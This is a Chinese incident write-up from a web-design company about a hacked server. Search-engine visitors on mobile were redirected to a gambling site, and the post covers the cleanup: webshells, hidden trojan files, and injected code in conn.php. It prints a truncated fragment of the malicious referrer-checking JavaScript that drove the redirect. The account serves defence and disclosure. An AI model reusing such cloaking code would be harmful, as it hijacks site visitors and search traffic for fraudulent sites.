訪問站點(diǎn)只要后面目錄帶apk(不管是文件還是目錄),就會(huì)判斷請求頭,如果為手機(jī)移動(dòng)端的請求頭,就會(huì)跳轉(zhuǎn)到*網(wǎng)站,如果是電腦PC瀏覽器,就會(huì)彈空白頁訪問站點(diǎn),讓你看不到跳轉(zhuǎn)后的網(wǎng)址,只要域名后面地址帶apk(不管是文件還是目錄),就會(huì)判斷請求頭,如果為手機(jī)移動(dòng)端的請求頭,就會(huì)跳轉(zhuǎn)bc網(wǎng)站,如果是電腦瀏覽器,就會(huì)彈空白頁,最近也加上客戶訂單越來越少,領(lǐng)導(dǎo)也是著急,很大一部分客戶渠道來源都從百度點(diǎn)擊來的,靜下心來看看網(wǎng)站到底是怎么回事,不看不要緊,簡直嚇我一跳。網(wǎng)站在百度里的收錄增加許多,本來以為是更新的文章導(dǎo)致的,可是仔細(xì)一想也沒那么多的收錄呀,site:網(wǎng)站,點(diǎn)擊到十頁以后竟然發(fā)現(xiàn)了問題的關(guān)鍵,百度收錄了一大堆我們網(wǎng)站沒有的URL鏈接,復(fù)制那個(gè)我們域名的鏈接,提示不存在,從百度收錄點(diǎn)進(jìn)去跳轉(zhuǎn)到BC網(wǎng)站。
排查過程
最初判斷可能是修改了js文件,但經(jīng)過長時(shí)間的瀏覽,文件內(nèi)容搜索等等該用上的技能都用上了,頭皮都發(fā)麻了,翻了2個(gè)小時(shí),都沒有發(fā)現(xiàn)js修改的一點(diǎn)痕跡,而且發(fā)現(xiàn)這個(gè)服務(wù)器的所有站點(diǎn)都有這個(gè)問題,看起來事情并不簡單,現(xiàn)在的當(dāng)務(wù)之急是盡快解決這個(gè)問題,否則影響太大。通過服務(wù)器的SINESAFE木馬查殺工具,查殺出多個(gè)變形的webshell,以及隱藏屬性無法刪除的木馬文件,本地掃描兩個(gè)上傳文件,火絨均報(bào)毒。
我這才明白過來,原來是我網(wǎng)站被黑了。趕緊打開服務(wù)器里的各個(gè)站點(diǎn),下載網(wǎng)站程序代碼到本地,然后挨個(gè)對(duì)每一個(gè)代碼進(jìn)行查看,查看是不是網(wǎng)站被黑客植入了木馬后門,果不其然在每個(gè)網(wǎng)站根目錄里的conn.php發(fā)現(xiàn)了黑客插入的惡意代碼:
functiongo_bots_url(){varinit_flag='apk',bct=document.referrer,bot=['baidu','google','yahoo','bing','soso','sogou','#','so.com','youdao','anquan','sm.cn'];//,'haosou'];for(variinbot){if(bct.indexOf(bot[i])!=-1){init_flag='apk';
去除掉惡意代碼后,網(wǎng)站從百度搜索點(diǎn)擊進(jìn)來的也正常顯示了,真是太無恥了,在服務(wù)器中查看隱藏屬性的文件普通肉眼是看不到的,需要用專門的SINESAFE木馬查殺工具才能看到,怪不得我找了大半天都沒找到問題根源。接下來的工作就是抓緊修復(fù)網(wǎng)站漏洞,以及對(duì)服務(wù)器上的所有站點(diǎn)進(jìn)行排查和漏洞修復(fù),防止被再次攻擊跳轉(zhuǎn),如果大家對(duì)程序代碼不太熟悉無法修復(fù)漏洞的話可以到網(wǎng)站安全公司去看看。
本文來源:徐州酷優(yōu)網(wǎng)絡(luò)科技有限公司
本文網(wǎng)址:https:///longquanshi/1476.html
聲明,本站文章均為酷優(yōu)網(wǎng)絡(luò)原創(chuàng)或轉(zhuǎn)載,歡迎分享,轉(zhuǎn)載時(shí)請注明文章作者和“來源:徐州網(wǎng)站建設(shè)”并附本文鏈接
覆蓋全江蘇省的服務(wù)網(wǎng)絡(luò)
全國7×24小時(shí)客服熱線
病毒殺出率高于99%
網(wǎng)站可用性高于99.9%
最快網(wǎng)站3天內(nèi)上線